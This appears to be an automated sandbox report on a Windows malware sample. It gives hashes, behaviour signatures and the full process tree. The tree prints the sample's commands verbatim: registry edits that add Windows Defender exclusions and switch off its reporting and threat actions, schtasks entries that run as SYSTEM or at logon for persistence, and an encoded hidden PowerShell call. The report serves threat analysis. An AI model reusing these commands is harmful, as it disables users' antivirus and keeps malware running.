Analysis
-
max time kernel
90s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
25-09-2022 16:17
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
8b1e06b99a07274e2a92a6968a5def7d
-
SHA1
a34b10a2a45a199f8df65d029c67d77dc0186df7
-
SHA256
716f6f4ab95a622941189c237a95b1fa11b09064c3fac87589cfad5b7e188a76
-
SHA512
c2ba5d767b5a673c0c6a789694f9c921fe5a1da378c4ba67c3da1d35f89737073bae4f64682556516a16a26cd2c709f6caa2bdc5e49503bde919c7a9d670b594
-
SSDEEP
196608:91OE12Z0GcA18oC1uOgREnFznYJH8w7+kdYh/q58vPEbc/6:3OyeB18HgODoTtduqCPER
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 31 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSB105.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSB6D1.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEQztwoKG" /SC once /ST 04:12:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEQztwoKG"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEQztwoKG"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beNJzxXkYGhzSCmkZn" /SC once /ST 16:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\PhBmCpB.exe\" Qf /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\PhBmCpB.exeC:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\MMqPNYIplLDGwAY\PhBmCpB.exe Qf /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CXdyuXxQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CXdyuXxQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCSurMlfClMRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCSurMlfClMRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YnFPtusxCOTU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YnFPtusxCOTU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bOFQhydRtxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bOFQhydRtxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RIEoyfpemMjlUPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RIEoyfpemMjlUPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MNBTbrbBidagOXts\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MNBTbrbBidagOXts\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CXdyuXxQU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCSurMlfClMRC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YnFPtusxCOTU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOFQhydRtxUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RIEoyfpemMjlUPVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RIEoyfpemMjlUPVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MNBTbrbBidagOXts /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MNBTbrbBidagOXts /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIXBqYieq" /SC once /ST 10:03:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gIXBqYieq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIXBqYieq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GrrjjXtPjBVPFNmZQ" /SC once /ST 13:18:16 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\qDipEDD.exe\" 76 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GrrjjXtPjBVPFNmZQ"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\qDipEDD.exeC:\Windows\Temp\MNBTbrbBidagOXts\wfcQztgHEpfDsSn\qDipEDD.exe 76 /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "beNJzxXkYGhzSCmkZn"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CXdyuXxQU\pxIMoT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ErhcMqZyPKQzNnH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ErhcMqZyPKQzNnH2" /F /xml "C:\Program Files (x86)\CXdyuXxQU\LBndYRX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
